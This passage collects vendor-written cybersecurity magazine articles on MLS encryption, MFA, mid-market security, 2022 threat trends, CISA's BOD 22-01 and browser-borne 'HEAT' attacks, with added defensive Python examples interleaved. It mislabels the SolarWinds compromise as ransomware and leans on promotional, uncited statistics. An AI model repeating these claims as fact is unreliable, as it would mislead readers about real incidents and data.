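Both checks are deliberately cheap so they can run continuously over flow logs or DNS server logs; the DNS check catches beaconing and DGA-style lookups, the HTTPS check catches the "regular bursts of encrypted traffic" from the text. Neither proves exfiltration on its own, which is why the summary lists suspects to triage rather than verdicts.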
It isn’t possible to block everything 100% and combating stupid makes it even harder. Since you can’t fix
stupid, these 4 things can minimize and contain the damage caused. More importantly, thinking like an
attacker will help you find signs if you were attacked and close off any holes and vulnerabilities that
attackers will use.
About the Author
Guy Rosefelt, Chief Product Officer, Sangfor Technologies. Guy is
Chief Product Officer for Sangfor Technologies. He has over 20 years’
experience (though some say it is one year’s experience twenty times)
in application and network security, kicking it off with 10 years in the
U.S. Air Force, reaching rank of captain. After his time in the USAF
building the first fiber to the desktop LAN and other things you would
find in Tom Clancy novels, Guy worked at NGAF, SIEM, WAF and
CASB startups as well as big-name brands like Imperva and Citrix. He
has spoken at numerous conferences around the world and in people's
living rooms, written articles about the coming Internet Apocalypse, and
even managed to occasionally lead teams that designed and built
security stuff. Guy is thrilled to be in his current position at Sangfor -- partly because he was promised
there would always be Coke Zero in the breakroom. His favorite cake is German Chocolate.
Guy can be reached online at guy.rosefelt@sangfor.com or on Twitter at @otto38dd and at our company
website https://www.sangfor.com/en .
On The Frontline in The War Against Hackers
By Damien Fortune, Chief Operations Officer of Secured Communications
In the wake of a global shift toward remote work, crime is moving from physical space to cyberspace. Businesses are conducting more important and valuable business online than ever before, and accordingly more valuable and sensitive information is being transmitted across networks they do not control. That has given bad actors both the incentive and the opportunity to focus on cybercrime, and with the growing sophistication of the threats and the cheap computing power behind them, cybersecurity companies have had to evolve to combat them.
Over the last decade, data breaches have surged, exposing sensitive information, and undermining
customer confidence which is potentially devastating, especially for smaller businesses. Companies, now
more than ever, need to know how to keep their data secure while maintaining a seamless and productive
work environment. On the back of these trends, new protocols are emerging to provide additional layers
of defense to corporate communications.
One of the newest tools in the fight against cybercrime is Messaging Layer Security (MLS), an end-to-end encryption (E2EE) protocol for group messaging being standardised at the IETF. Rather than one long-lived key, MLS derives a fresh key for each message from a chain that is ratcheted forward and periodically refreshed with new key material from the group members. That gives it forward secrecy (a key captured today does not unlock messages already sent) and post-compromise security (once the group refreshes its keys, an attacker who stole a member's state is locked out again), so a single compromised message key exposes that message alone rather than the whole conversation. Most communications platforms on the market today rely only on transport layer security (TLS). TLS protects a message on the wire between the client and the provider's server, and modern TLS offers forward secrecy of its own, but the server still handles every message in the clear, so a breach of the provider, a subpoena or an insider exposes the entire history. E2EE closes that gap; TLS alone does not.
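To make the "changing key per message" idea concrete, here is an added Python illustration (not the article's or Secured Communications' code, and not the MLS protocol itself) of a symmetric hash ratchet: each message key is derived from a chain key that is then stepped forward and discarded. The simulation shows what forward secrecy buys when an attacker steals a sender's state, and why post-compromise security additionally needs fresh key material mixed in, which is what an MLS key update supplies. The XOR keystream is a stand-in for a real AEAD and is unauthenticated; everything here is standard library only.

```python
"""Added example: a symmetric hash ratchet, the mechanism behind "a changing key per
message", showing what forward secrecy does and does not buy. Toy code on the standard
library; it is not MLS and the XOR stream below is unauthenticated."""
import hashlib
import hmac
import os
from typing import List, Optional


def ratchet_step(chain_key: bytes):
    """One KDF-chain step: (message_key, next_chain_key). HMAC is one-way, so holding
    a later chain key does not reveal earlier chain or message keys."""
    message_key = hmac.new(chain_key, b"message", hashlib.sha256).digest()
    next_chain_key = hmac.new(chain_key, b"chain", hashlib.sha256).digest()
    return message_key, next_chain_key


def xor_stream(key: bytes, index: int, data: bytes) -> bytes:
    """Toy keystream cipher (SHA-256 in counter mode). Real deployments use an AEAD."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + index.to_bytes(4, "big") + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


class Chain:
    """One party's sending chain. Both ends run identical steps from a shared root."""

    def __init__(self, chain_key: bytes, index: int = 0):
        self.chain_key = chain_key
        self.index = index

    def next_message_key(self):
        mk, self.chain_key = ratchet_step(self.chain_key)   # the old chain key is discarded
        self.index += 1
        return self.index, mk

    def mix_in(self, fresh_secret: bytes) -> None:
        """Fold fresh entropy into the chain (what an MLS key update does through the
        group's key tree). Anyone holding only the old chain key can no longer follow."""
        self.chain_key = hmac.new(self.chain_key, fresh_secret, hashlib.sha256).digest()


def attacker_readable(num_messages: int, steal_after: int, rekey_at: Optional[int] = None) -> List[int]:
    """Alice sends `num_messages` messages. The attacker copies her chain state right
    after message `steal_after` (0 = the root itself leaked). If `rekey_at` is set, Alice
    mixes a fresh secret into her chain after that message. Returns the indices the
    attacker can decrypt by replaying the ratchet forward from the stolen state."""
    alice = Chain(os.urandom(32))
    stolen = Chain(alice.chain_key, 0)
    ciphertexts = []
    for i in range(1, num_messages + 1):
        idx, mk = alice.next_message_key()
        ciphertexts.append((idx, xor_stream(mk, idx, f"message {i}".encode())))
        if i == steal_after:
            stolen = Chain(alice.chain_key, alice.index)     # snapshot of the current state only
        if i == rekey_at:
            alice.mix_in(os.urandom(32))
    readable = []
    for idx, ct in ciphertexts:
        if idx <= steal_after:
            continue          # those message keys were derived and deleted earlier: forward secrecy
        _, mk = stolen.next_message_key()
        if xor_stream(mk, idx, ct) == f"message {idx}".encode():   # demo check; real code verifies an AEAD tag
            readable.append(idx)
    return readable


if __name__ == "__main__":
    print("hash ratchet only, state stolen after msg 3:", attacker_readable(6, steal_after=3))
    print("same, but a key update after msg 3:        ", attacker_readable(6, 3, rekey_at=3))
```

With the hash ratchet alone, a state theft after message 3 leaves messages 1 to 3 safe but lets the attacker derive every later key, which is exactly why MLS periodically injects fresh, asymmetrically agreed key material: after the update the attacker's copy of the chain diverges and post-compromise security is restored.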
Alongside protection of the content itself, tools to protect users are also advancing. Multi-Factor Authentication (MFA), which requires users to present two or more independent proofs of identity before they get access, has become far more prevalent. The factors are drawn from three categories: something the user knows (a password or PIN), something they have (a phone, a hardware key or the enrolled device itself) and something they are (biometrics such as Touch ID or Face ID). A login that uses only one category is single-factor however strong it is; a password plus a second password is not MFA. Note also that Touch ID or Face ID on a phone unlocks a key stored on that device, so in practice the biometric is protecting the "something you have" rather than being sent to the service. Phishing-resistant options such as FIDO2/WebAuthn security keys and platform authenticators bind the second factor to the site's origin, which is what defeats the real-time relay attacks that capture one-time codes.
Increasing technical sophistication and access to more computing power by those that choose to hack
into business systems has made the migration to more-sophisticated tools inevitable. With modern
workflows continuing to shift from outdated email systems in favor of messaging and collaboration-centric
tools, we would expect MLS, MFA, and other tools to come to the forefront of cybersecurity suites in the
near term.
About the Author
Damien Fortune is the Chief Operations Officer of Secured
Communications, the leading global technology company specializing in
ultra-secure, enterprise communications solutions that are trusted by
businesses, public safety and counter terrorism professionals worldwide.
His career began on Wall Street where he worked as a sell-side analyst
covering energy and industrial equities. From there he transitioned into
private equity as a portfolio manager and eventually into a role as
CFO/COO of a portfolio company.
Damien can be reached online at support@securedcommunications.com
and at our company website http://www.securedcommunications.com.
How to Fix Mid-Market Security Using Intelligent
Automation and AI
By Guy Moskowitz, CEO, Coro
Market forces are working against medium-sized businesses, leaving companies that don't have large, dedicated security teams and fat cyber security budgets exposed to cyber threats. Combined with the global pandemic and the fact that cyber criminals have expanded into mid-market targets, medium-sized companies face greater risk than ever, and it's time IT leaders and the industry step up to close this gap.
Three factors have arisen that have had dire consequences for medium-sized businesses:
1. The cyber security industry has neglected the mid-market in its pursuit of enterprise-grade
security solutions with proportional enterprise price tags.
2. The global pandemic accelerated the trend toward remote work and adoption of cloud platforms,
leaving many companies with much larger attack surfaces, and an out-of-date cybersecurity
architecture.
3. Due to commoditization of cyber attacks, cyber criminals turned their eyes toward the mid-market,
which has proven to be less sophisticated and less funded in terms of cyber security.
The Cyber Security Market Has Failed Medium-Sized Businesses
The cyber security market has bifurcated into large enterprise solutions and niche point solutions. Mid-market companies are stuck in an inhospitable middle: they don't have the budget and resources to purchase large enterprise solutions, but they have too much complexity and attack surface for point solutions to provide effective security.
The high cost of implementing and operating security solutions severely impedes their adoption by mid-market companies. Companies with 1,500 or fewer employees often have limited cyber security budgets and very few dedicated security professionals, if they have any specialists at all. Hundreds of employees and thousands of endpoints create an attack surface that stretches IT teams to their limits. Mid-market companies are therefore forced to bet on the most probable attack vectors to defend against, leaving the rest of the attack surface exposed.
The Pandemic-Driven Shift Toward Remote Work Caught IT Departments Flat Footed
Nobody was ready for large-scale remote work in 2020. Teams were not culturally prepared to conduct
business online, office software wasn’t designed for remote work as its primary use case, and IT
departments had mostly focused on on-site and VPN-style security. The shift to predominantly remote
work in 2020 and 2021 disrupted every aspect of business and created huge opportunities for attackers
seeking to exploit the relative naivete of the new cloud working environment.
In Coro’s recent report analyzing mid-market cyber security, we found that while 50% of medium-sized
companies had email malware protection in place in 2021, 88% of them had misconfigured their
protection settings. Meanwhile, only 16% of mid-sized companies had email phishing protection in place,
and 71% of them had misconfigured settings. Other attack vectors fared similarly or worse. This means
many of the technologies deployed by IT teams, and especially the new ones deployed since the
beginning of the pandemic to enable remote work, offer little actual protection against emerging classes
of cyber threats.
Cyber Criminals Are Turning Downstream for Easier Pickings
A big score against a large enterprise is exciting for a cyber criminal, but so is the prospect of several
smaller, easier scores. We observed this in practice in 2021 as attacks on medium-sized companies
increased both in volume and in sophistication.
Specifically, we saw that attacks on mid-market companies increased by 150% in the past two years.
Moreover, these attacks are not just generic (AKA naive) attacks, but are increasingly tailored to the particular victims being targeted. Customized attacks against mid-market companies
have expanded 4x in 2021. Insider threats, whether accidental or malicious, have also doubled in 2021,
showing the greater role employees have played in cyber vulnerabilities during the pandemic.
Closing the Mid-Market Cyber Security Gap with Intelligent Automation and AI
Mid-market spending on cyber security was up in 2021 as companies began to feel the heat from cyber
criminals testing their defenses. But most of the industry’s comprehensive cyber security solutions are
aimed at large enterprise customers – and mid-market companies need options beyond stitching together
piecemeal point solutions.
The three challenges to mid-market cyber security remain: overly expensive and complicated solutions,
greatly expanded attack surface driven by remote work, and increased attacks by hackers seeking to
exploit the mid-market. To overcome these challenges, companies need affordable solutions that
augment existing IT with built-in intelligence and non-disruptive security workflows. This is where
automation and AI come in.
As I said earlier, 88% of the mid-sized companies that had email malware protection had misconfigured it, and that doesn't even account for cloud malware, Wi-Fi phishing, and a huge range of emerging attack vectors for which most mid-sized companies have no protection in place. Why should such misconfigurations and omissions leave a company exposed to cyber threats, especially when a single breach could paralyze a business or cause enough damage to close its doors forever? Where possible, the responsibility for effective cyber defense needs to shift off the shoulders of overstretched IT teams and onto machines. AI must be deployed to let small teams with limited resources manage large and complex situations effectively. Small companies should seek solutions that simplify the security experience: comprehensive, all-in-one solutions that are easy to deploy and easy to operate through intuitive UX design and AI automation.
The truth is, most small and mid-sized companies don’t need dozens of security professionals to manage
straightforward and common security tasks. Look for security solutions that instead make use of
intelligent automation to reduce the load on IT and security teams. Intelligent automation can
automatically block malware threats, prevent accidental or malicious data leakage, lock down rogue
accounts, and prevent the majority of incoming attack attempts, all without human intervention. For the
small percentage of issues that AI and intelligent automation can’t resolve, a concise and clear notification
can be sent to administrators that can be resolved quickly and easily.
Even in this rapidly evolving cyber climate, the cost and complexity of security can be managed, and escalating cyber threats can be controlled. Comprehensive cyber security can and should be fully accessible to mid-sized companies. It's time for mid-market IT leaders to reconsider the standard point solutions and seek comprehensive, AI-enabled software with built-in intelligence, designed specifically for their needs: elegant, non-disruptive security within a single, efficient platform.
About the Author
Guy Moskowitz is the CEO of Coro, one of the fastest growing
security solutions for the mid-market, providing all-in-one protection
that empowers organizations to defend against malware,
ransomware, phishing, and bots across devices, users, and cloud
applications. Guy can be reached online at (LinkedIn and Twitter) and
at our company website https://www.coro.net/
5 Ways Cybersecurity Will Change In 2022
By Jaime Coreano, Vice President of Sales – Flexxon
The annual cost of cybercrime is set to hit $10.5 trillion by 2025. The losses caused by theft, fraud and
embezzlement are compounded by the disruption that follows. Forensic investigations, restoration and
deletion of hacked data and systems, lost productivity and, inevitably, reputational harm all add to the
bill.
Of course, cybercrime is a shape-shifting enemy that quickly adapts to its surroundings. As more of our
national, corporate and personal business goes digital, new threats emerge and priorities shift.
Forewarned is forearmed, however! So, to make sure we have the right cybersecurity technologies in place and carry out meaningful tech-stack reviews, here are the top five cybersecurity trends that X-PHY has identified for 2022.
#1: Firmware level attacks will increase
The much-cited Security Signals Report published by Microsoft in March 2021 noted that at least 80
percent of enterprises in major economies had suffered at least one attempted firmware attack in the
previous two years.
Firmware attacks are daunting precisely because firmware sits ‘below’ the operating system, where the
most common and familiar tools for detecting and quarantining malware cannot see them. But until now,
firmware threats have not been treated seriously enough by enterprise security teams. As the Security
Signals Report tells us, only 29 percent of security budgets were allocated to protect firmware.
That has to change.
There are many ways that firmware attacks can be launched against network devices and endpoints and cause untold amounts of damage. Equally, there are plenty of basic housekeeping and security steps that eliminate a number of potential vulnerabilities: keep UEFI, BMC and device firmware patched, boot with UEFI Secure Boot enforcing rather than disabled or left in setup mode, accept only vendor-signed firmware updates, and use TPM-measured boot so that an altered boot chain can be detected. AI-enabled security at the firmware level, for example on the storage device itself, adds real-time protection against software-based malware, ransomware and viruses without human intervention.
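Because firmware sits below the operating system, the first thing to verify on a fleet is whether the platform's own boot protection is actually enforcing. The following Python (added here; not the article's or Flexxon's code) reads the UEFI SecureBoot and SetupMode variables the way the Linux kernel exposes them under efivarfs and reduces them to a verdict. The efivarfs layout (4 bytes of little-endian attribute flags, then the variable data) and the EFI global variable GUID are the standard ones; the verdict strings are an assumption for the demo.

```python
"""Added example: read UEFI Secure Boot state from efivarfs. Each file there is a
4-byte little-endian attribute header followed by the variable's data; SecureBoot and
SetupMode carry one data byte each. Not the article's code."""
import struct
from pathlib import Path
from typing import Optional

EFI_GLOBAL_VARIABLE_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = Path("/sys/firmware/efi/efivars")


def parse_efivar(raw: bytes):
    """Split an efivarfs file body into (attribute flags, variable data)."""
    if len(raw) < 4:
        raise ValueError("efivarfs file shorter than its 4-byte attribute header")
    (attrs,) = struct.unpack("<I", raw[:4])
    return attrs, raw[4:]


def boolean_var(raw: bytes) -> bool:
    """SecureBoot / SetupMode carry exactly one data byte: 1 = set, 0 = clear."""
    _, data = parse_efivar(raw)
    if len(data) != 1:
        raise ValueError(f"expected 1 data byte, got {len(data)}")
    return data[0] == 1


def secure_boot_verdict(secure_boot: Optional[bytes], setup_mode: Optional[bytes]) -> str:
    """Reduce the two variables to what a reviewer wants to know. None means the
    variable is absent (legacy BIOS/CSM boot, or efivarfs not mounted)."""
    if secure_boot is None:
        return "no-uefi-variables"          # cannot be enforcing without UEFI
    if setup_mode is not None and boolean_var(setup_mode):
        return "setup-mode"                 # no Platform Key enrolled: nothing is enforced
    return "enforcing" if boolean_var(secure_boot) else "disabled"


def read_global_var(name: str) -> Optional[bytes]:
    path = EFIVARS / f"{name}-{EFI_GLOBAL_VARIABLE_GUID}"
    return path.read_bytes() if path.exists() else None


if __name__ == "__main__":
    print(secure_boot_verdict(read_global_var("SecureBoot"), read_global_var("SetupMode")))
```

Anything other than "enforcing" on a machine that is supposed to have Secure Boot is a finding worth a ticket: "setup-mode" in particular looks like an enabled setting in some BIOS menus while enforcing nothing. The same two variables are what `mokutil --sb-state` reports; the script reads them directly so it can be dropped into an inventory job that runs as an unprivileged user wherever efivarfs is mounted.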
#2: More firms will be subject to an inside job
The measures security professionals take to narrow the attack surface are based on the simple idea that
the threat is ‘out there.’ But this focus on preventing and detecting external attacks can create a significant
blind spot: the threat from inside.
Whether from malicious intent or clumsy accident, trusted employees and partners can cause more
damage than ever before. New ways of working and greater digital engagement change the nature of the
company network and its assets. According to Ponemon Institute's 2022 Cost of Insider Threats: Global Report, the incident rate is up 44 percent over the past two years, and the average annual cost of insider incidents to an affected organization now stands at $15.38 million. There is little sign that this is slowing down.
In this environment the zero-trust model treats every access request as untrusted, whoever makes it and wherever it comes from, with no exception for seniority or for being on the corporate network. That means proper multi-factor authentication for every access to every system or service, least-privilege access, plus monitoring, logging and effective pattern detection to catch anomalous insider behavior. It may be an uncomfortable idea for many, but it is a necessary one.
#3: Supply chains will be the big ransomware target
In July 2021, a medical management services provider in New York experienced a ransomware attack
that affected more than 1.2 million individuals – one of the largest breaches of health data reported to the
federal regulators in 2021.
We are all familiar with the threat of ransomware. What is changing is the number of cyberattacks – like
this one – that target trusted third-party vendors who offer services or software that are vital to the supply
chain, but which attack agents regard as softer targets.
IT decision-makers believe that these kinds of supply chain attacks will become one of the biggest threats to their organizations in the coming year. But most have not vetted either their current or prospective suppliers in the past 12 months.
To stay ahead of it, now is the time for organisations to vet their suppliers and put a response strategy in place. Until they do, the supply chain will remain an attractive target.
#4: Increased risk for SMBs
The world has changed but the age-old mantra still applies: attack agents will always go for the easiest
target. That is what is driving the growth in supply chain attacks – and is also behind the increasing
frequency of attacks on SMBs.
In its 2020 Internet Crime Report, the FBI recorded 791,790 complaints of suspected internet crime across all victims (more than 300,000 more than in 2019), with total losses of more than $4.2 billion.
SMBs may not have the resources or expertise to protect themselves adequately, but they still have
valuable information residing within their systems. That’s why they are subject to growing numbers of
targeted and complex attacks.
In addition, the recent mass shift toward remote and hybrid working practices has seen people’s private
and professional lives becoming intertwined, often resulting in a less than diligent approach to
cybersecurity. With that, SMBs have experienced a jump in cyberattacks enabled by human error. A widely cited figure attributes 95 percent of data breaches to human error, a problem the pandemic has only heightened.
As such, it has become clear that just like everyone else, SMBs need robust cybersecurity that includes
all layers, from software to the physical and everything in between.
Enter, AI-infused cybersecurity solutions. AI has the power to reduce human intervention, allowing data
to be secured without the need for extensive knowledge or training.
#5: Vulnerabilities in critical Infrastructure will be recognized
At the other end of the scale is critical national infrastructure, which is increasingly digitalized but reliant
on security measures for control systems that were developed before data, sensors, and networking were
embedded in core control systems.
Critical infrastructure is no more immune to the natural laws of cybersecurity than any other sector of the
economy: surges in technological development create the perfect environment for cyber crime to flourish,
and the targets with the highest value but weakest security will be top of the list.
An attack on the building management system of a single New York City office block, via a connected vending machine, caused damage estimated at $350m. The economic impact of a severe cyber-attack on the US power grid could be at least $240bn.
But the motive to hit critical infrastructure isn’t just financial. It can be political too. Hacktivists, terrorists
and foreign agents see energy grids, health systems, and transport logistics, as useful bargaining tools.
Intelligent, bullet-proof solutions are needed, ideally a zero-trust architecture with an AI-embedded cyber-secure SSD as the last line of defense.
This is X-PHY’s final, unofficial, prediction for 2022. Offense is getting smarter. So will the defense. This
is the year that zero-trust architecture becomes the lens through which all cybersecurity solutions are
viewed.
About the Author
Jaime Coreano is Vice President of Sales at Flexxon. As a Sales
and Business Development executive with 25 years of experience
in semiconductors, electronic components and cybersecurity, his
vision and strategy have greatly impacted the success of his clients
in the Americas. Most recently, he has been involved in emerging
Cyber Security solutions based on hardware level AI based
protection against ransomware, data cloning and physical attacks.
our company website https://www.flexxon.com/
Executive Order Instructs Certain Organizations to
Improve Their Cybersecurity Stance
Financial Institutions Should Boost Their Efforts to Thwart Cyberattacks
By Bob Thibodeaux, Chief Information Security Officer, DefenseStorm
Consumer data is one of the most valuable assets for organizations around the world. In fact, it’s been
said that consumer data is as good as gold.
And like gold, data is a commodity. However, companies profiting by accessing and storing this data
have the responsibility to keep it safe. Protecting data has even become a consumer expectation thanks
to breaches such as Equifax in 2017 (which recently finalized a settlement of up to $425 million) and
LinkedIn and Facebook just last year.
Today, however, companies don’t just put consumer interest on the line when building their cybersecurity.
They can now face new, severe legal action.
Issuing directives in the hope of minimizing damage
In November 2021 the Cybersecurity and Infrastructure Security Agency (CISA), part of DHS, issued Binding Operational Directive 22-01. It requires federal civilian executive branch agencies to remediate, within set deadlines, the vulnerabilities listed in CISA's Known Exploited Vulnerabilities (KEV) catalog: several hundred at launch, each one observed being exploited in the wild and each considered a significant risk of damaging intrusion, including data breaches or compromise of government computer systems.
Specifically, “Organizations of all sizes, including the federal government, must protect against malicious cyber actors who seek to infiltrate our systems, compromise our data, and endanger American lives,” DHS Secretary Alejandro Mayorkas said in a statement alongside the directive. The new order “requires federal civilian departments and agencies to protect against critical known vulnerabilities, which will reduce the risk of malicious intrusion and increase our collective cybersecurity.”
The directive itself binds only federal civilian agencies; banks, credit unions and fintechs are not covered by it. But CISA recommends that every organization prioritize the same catalog, and the message for financial institutions nationwide is the same: find a way to meet that bar, closing the vulnerabilities known to be exploited before they are used against you. But how? What if you are already behind the 8 ball? What can be done not only to improve but to catch up?
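One concrete way to "meet that bar" is to diff your asset inventory against the KEV catalog and work the overdue items first. The Python below is an added example (not the article's or DefenseStorm's code) that does this against a catalog export in the JSON layout CISA publishes alongside the catalog: a top-level "vulnerabilities" list whose entries carry cveID, vendorProject, product, dateAdded, dueDate and requiredAction. The catalog rows, the inventory and the CVE-0000-* identifiers are constructed placeholders, not real vulnerabilities; the vendor/product matching is deliberately simple and a real deployment would map both sides to CPE names first.

```python
"""Added example (not from the article): check an asset inventory against a KEV
catalog export in the JSON layout CISA publishes. Catalog rows and inventory are
constructed placeholders; CVE-0000-* are not real identifiers."""
import json
from datetime import date

KEV_SAMPLE = json.dumps({
    "title": "constructed sample, not the live catalog",
    "vulnerabilities": [
        {"cveID": "CVE-0000-0001", "vendorProject": "ExampleCorp", "product": "MailGate",
         "vulnerabilityName": "placeholder", "dateAdded": "2022-02-10", "dueDate": "2022-02-24",
         "requiredAction": "Apply updates per vendor instructions.", "notes": ""},
        {"cveID": "CVE-0000-0002", "vendorProject": "ExampleCorp", "product": "MailGate",
         "vulnerabilityName": "placeholder", "dateAdded": "2022-03-01", "dueDate": "2022-09-01",
         "requiredAction": "Apply updates per vendor instructions.", "notes": ""},
        {"cveID": "CVE-0000-0003", "vendorProject": "OtherVendor", "product": "CoreLedger",
         "vulnerabilityName": "placeholder", "dateAdded": "2022-01-05", "dueDate": "2022-01-19",
         "requiredAction": "Apply updates per vendor instructions.", "notes": ""},
    ],
})

# Constructed inventory. mx2 deliberately uses different capitalisation: KEV strings
# and CMDB strings rarely agree byte for byte, so the matcher has to normalise.
INVENTORY = [
    {"asset": "mx1", "vendor": "ExampleCorp", "product": "MailGate", "patched": {"CVE-0000-0001"}},
    {"asset": "mx2", "vendor": "examplecorp", "product": "mailgate", "patched": set()},
    {"asset": "db1", "vendor": "SomeoneElse", "product": "Postgres", "patched": set()},
]


def load_kev(text: str):
    return json.loads(text)["vulnerabilities"]


def _key(vendor: str, product: str):
    return vendor.strip().lower(), product.strip().lower()


def kev_exposure(kev, inventory, today: date):
    """Every (asset, CVE) pair where the asset runs a KEV-listed product and has not
    recorded the fix, with the catalog due date and whether it has already passed."""
    findings = []
    for asset in inventory:
        for v in kev:
            if _key(v["vendorProject"], v["product"]) != _key(asset["vendor"], asset["product"]):
                continue
            if v["cveID"] in asset["patched"]:
                continue
            due = date.fromisoformat(v["dueDate"])
            findings.append({
                "asset": asset["asset"], "cve": v["cveID"], "due": v["dueDate"],
                "overdue": today > due, "days_left": (due - today).days,
                "action": v["requiredAction"],
            })
    findings.sort(key=lambda f: (not f["overdue"], f["due"], f["asset"]))  # overdue first
    return findings


def exposure_report(today_iso: str):
    """Run the check on the constructed catalog and inventory for a given date."""
    return kev_exposure(load_kev(KEV_SAMPLE), INVENTORY, date.fromisoformat(today_iso))


if __name__ == "__main__":
    for f in exposure_report("2022-03-15"):
        flag = "OVERDUE" if f["overdue"] else f"{f['days_left']}d left"
        print(f"{f['asset']:4} {f['cve']:14} due {f['due']} {flag}")
```

Run against the live feed, the report gives a small institution the same prioritised list the directive gives an agency: what is exposed, what the required action is, and which items are already past the date CISA set. The "patched" set is the part that needs discipline; it has to be fed from patch telemetry, not from a spreadsheet someone intends to update.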
Meeting challenge with opportunity
While the new government mandate might seem an insurmountable challenge to all but the big
corporations, it isn’t. Rather, it’s an opportunity to shore up security and thwart cyberattacks and data
breaches.
Financial institutions everywhere already abide by considerable cybersecurity, privacy and information
security requirements. Further, many have adopted the National Institute of Standards and Technology’s
(NIST) Cybersecurity Framework as their main cyber risk management tool. But financial institutions that
haven’t met those standards could take the order as an impetus to do so and improve their cybersecurity
posture and make improvements in the maturity of their risk management program.
Perhaps, too, financial institutions will view the broader federal push as a reason to enact zero-trust policies, procedures and the relevant technologies. The zero-trust mandate for executive branch agencies comes not from BOD 22-01 but from Executive Order 14028 (May 2021) and the federal zero trust strategy, OMB memorandum M-22-09 (January 2022), that implements it.
Putting cybersecurity best practices in place
Whether a bank, credit union or fintech adopts a zero-trust model or not, it’s wise to consider these best
practices to increase cybersecurity:
• Proactively monitor total cyber exposure. Consider partnering with a built-for-banking
company that provides 24/7, real-time cybersecurity and cyber compliance and sends alerts of
any anomalies.
• Stay ahead of fraud. Fraud costs U.S. financial institutions $35 billion a year. Choose a cybersecurity provider that can bring information security, Bank Secrecy Act/anti-money laundering (BSA/AML) compliance and the fraud department together on a unified platform, to prevent losses and protect account holders from the growing threat of fraud.
• Extend internal cyber teams and expertise with highly skilled and trained security experts.
Not every financial institution has the resources to adequately monitor and protect their networks,
particularly outside of “banking hours.” As such, many partner with a certified cybersecurity
provider that monitors and investigates alerts and provides around-the-clock protection that aligns
with a company’s specific escalation process. By being that “extra set of eyes,” financial
institutions can focus on their core business.
• Keep up to date with compliance. Choosing a cybersecurity provider that also provides cyber
compliance makes it simple and seamless for financial institutions to stay up to date, even though
regulatory requirements seem to be always changing. The right provider allows financial
institutions to leverage an always-on policy and control engine to make sure when compliance
requirements change, organizations can comply.
• Provide ongoing cybersecurity education. An organization is only as secure as its weakest
link. Therefore, employee education should be a top priority. Employees should understand how
to do things like choose passwords wisely and know how to detect phishing attacks – and what
to do when a questionable email comes their way.
Leveraging a trusted cybersecurity partner
The current administration has prioritized cybersecurity as a national security threat. The mandate aside,
cybersecurity should be a priority for everyone and every business.
Financial organizations failing to address cybersecurity could face major damage that includes monetary
loss, legal consequences, and reputational damage – leading to a loss of customers.
Keep in mind that financial institutions face more than 70 million cyber events a day. Most small- to mid-sized financial institutions simply don't have the staff to manage the volume of incidents these events can generate, particularly those occurring after hours.
An experienced cybersecurity provider can help ensure financial institutions are threat-ready and secure. The right one consolidates data from all sources without volume limits, providing real-time visibility into the entire network, and tunes out false positives and prioritizes events so you can address the threats that matter most.
Because here’s the thing: There are two types of organizations – those that have suffered a data breach
and those that will.
And like the price of gold that keeps rising, so, too will the cost of falling prey to a cyber breach.
About the Author
Bob Thibodeaux, Chief Information Security Officer at
DefenseStorm, has more than 20 years of experience as a senior
security expert and highly accomplished IT executive and
engineer. Through leadership positions managing IT departments
and programs, technology operations and data center operations,
Bob has driven innovative process improvements, disaster
recovery programs, information security strategies, and audit and
compliance improvements. He has been responsible for incident
response, risk management and penetration testing for
community-focused banks, credit unions and high-tech companies
across the United States. Bob is a Certified Information Systems
Security Professional, Digital Forensics Examiner and GIAC
Penetration Tester. Bob holds a degree in Business and
Management from the University of Maryland and is a retired
USAF Senior Master Sergeant. Bob can be reached online at our
company website https://www.defensestorm.com/.
Too Hot to Handle: The case for Zero Trust and SASE
By Jonathan Lee, Senior Product Manager, Menlo Security
In security today we often see a continued reliance on legacy systems and solutions.
As cybercriminals have evolved their methods, the security adopted by firms, still built around a mindset
focused on detection and response, has been unable to keep up – and criminals know this.
The recent shift of data, users and applications to the cloud has made the browser the primary place of
work. Yet when it comes to the cloud, those same on-prem security measures that are still heavily relied
upon today are no longer adequate.
To capitalise on this new landscape, threat actors are targeting web browsers with a category of threats,
termed Highly Evasive Adaptive Threats (HEAT), that bypass traditional security defences.
HEAT attacks make web browsers the primary attack vector, deploying various methods to evade
multiple layers of detection in legacy security stacks. This allows them to bypass traditional web security
protection and leverage the standard capabilities of modern web browsers to deliver malware or
compromise credentials.
In its analysis of almost 500,000 malicious domains, Menlo Security Labs discovered that 69% of these
websites used HEAT tactics to deliver malware. These attacks allow bad actors to deliver malicious
content to the endpoint by adapting to the targeted environment. Since July of last year, our research
team has seen a 224% increase in HEAT attacks.
Given that many of us now spend around three-quarters of our day using a web browser, it’s an obvious
target.
HEAT attacks leverage one or more of the following core techniques that bypass legacy network security
defences:
1. Evades both static and dynamic content inspection: HEAT attacks evade both signature and
behavioural analysis engines to deliver malicious payloads to the victim using innovative techniques,
such as HTML Smuggling. This technique was used by Nobelium, the hacking group behind the
SolarWinds ransomware attack. In a recent case, dubbed ISOMorph, the campaign used the popular
Discord messaging app to host malicious payloads. Menlo Labs identified over 27,000 malware attacks
delivered using HTML Smuggling within the last 90 days.
2. Evades malicious link analysis: These threats evade malicious link analysis engines traditionally
implemented in the email path where links can be analysed before arriving at the user.
3. Evades offline categorisation and threat detection: HEAT attacks evade web categorisation by
delivering malware from benign websites, either by compromising them or by patiently creating new ones.
These are referred to as Good2Bad websites. Menlo Labs has been tracking an active threat campaign dubbed
SolarMarker, which employs SEO poisoning. The campaign started by compromising a large set of low-
popularity websites that had been categorised as benign, infecting these websites with malicious content.
Good2Bad websites have increased 137% year-over-year from 2020 to 2021.
4. Evades HTTP Traffic Inspection: In a HEAT attack, malicious content such as browser exploits,
crypto-mining code, phishing kit code and images impersonating known brands’ logos is generated by
JavaScript in the browser by its rendering engine, making any detection technique useless. The top three
brands impersonated in phishing attacks are Microsoft, PayPal, and Amazon. A new phishing website
imitating one of these brands is created every 1.7 minutes.
The case for Zero Trust and SASE
Be it file inspections performed by SWG anti-virus engines and sandboxes, network and HTTP-level
inspections, malicious link analysis, offline domain analysis, or indicator of compromise (IOC) feeds,
many legacy defences are rendered near useless when confronted with these evasive techniques.
A significant part of the challenge lies in the fact that HEAT characteristics equally have genuine uses.
Therefore, they cannot simply be blocked at the function level. Rather, they need to be prevented.
